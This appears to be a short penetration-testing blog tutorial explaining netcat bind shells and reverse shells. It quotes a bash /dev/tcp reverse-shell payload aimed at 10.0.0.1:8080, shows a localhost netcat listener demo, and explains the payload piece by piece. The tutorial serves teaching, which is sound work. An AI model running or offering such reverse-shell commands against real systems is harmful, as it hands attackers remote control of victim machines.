To better understand the concepts of this article, we need to start with the basics. On Unix systems, the cat
command is used to merge files and direct their contents to standard output, that is, display them on the screen. The netcat
, on the other hand, is a tool that allows TCP or UDP connections between two computers, meaning that it can transfer as well as read files over an open port. In some cases it happens to be possible through netcat
to execute commands. Hence its name - a combination of net
and cat
.
From the point of view of penetration testing, the most useful functionality of netcat is the use of reverse shells and bind shells. But what are they really?
Bind shell
The concept of a bind shell is that the attacker's machine acts as a client and the victim's machine acts as a server, which opens a communication port and waits for the client (attacker) to connect to it, and then issues commands to be executed remotely on the victim's machine.
For this to be possible, the victim machine would have to have a public IP, or the attacker and the remote host would have to be on the same IP subnet, or on subnets that are directly routed to each other without any form of network address translation (NAT) between them. Such a requirement exists because the attacker must be able to direct netcat directly to the machine's IP address in order to get a response.
Reverse shell
As the name suggests, this is the reverse of bind shell. In this case, the attacker's machine (which has a public IP) acts as a server that has an open communication channel on a given port and waits for incoming connections. The victim machine behaves like a client and initiates a connection to the attacker's server, which listens.
In cheatsheet on reverse shell, we can find several payloads used to create the connection. One of them includes:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Let's try to create a (unsafe) shell on localhost (instead of 10.0.0.1). To begin with, in the first shell, open TCP port number 8080 to listen on the connection.
nc localhost -lp 8080
Now we will use the earlier payload, which is used to redirect the IO stream to a TCP socket. To do this, we open a second shell and run the following command there.
bash -i >& /dev/tcp/localhost/8080 0>&1
Let's analyze the payload from the beginning.
-
bash -i
- From the documentation we can learn that: If the -i option is selected, the shell is interactive, -
>&
- redirects stdout and stderr to the indicated location, -
/dev/tcp/localhost/8080
- this is the argument for>&
. It points to a TCP client connection to localhost with port 8080, -
0>&1
- redirects the stdin file descriptor to stdout, so that the open TCP socket is used to read the input data.
If everything came out correctly, we should have an open prompt in the first shell.
Summary
Putting everything together - we can say that in the case of bind shell it is the attacker who initiates the connection, when in the case of reverse shell it is the target who initiates it. In bind shell, the remote host acts as the server and our machine as the client. In reverse shell, on the other hand, our machine acts as the server and the remote host is the client.
Sources
https://www.mvps.net/docs/what-is-netcat-and-how-to-use-it/
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell
Top comments (0)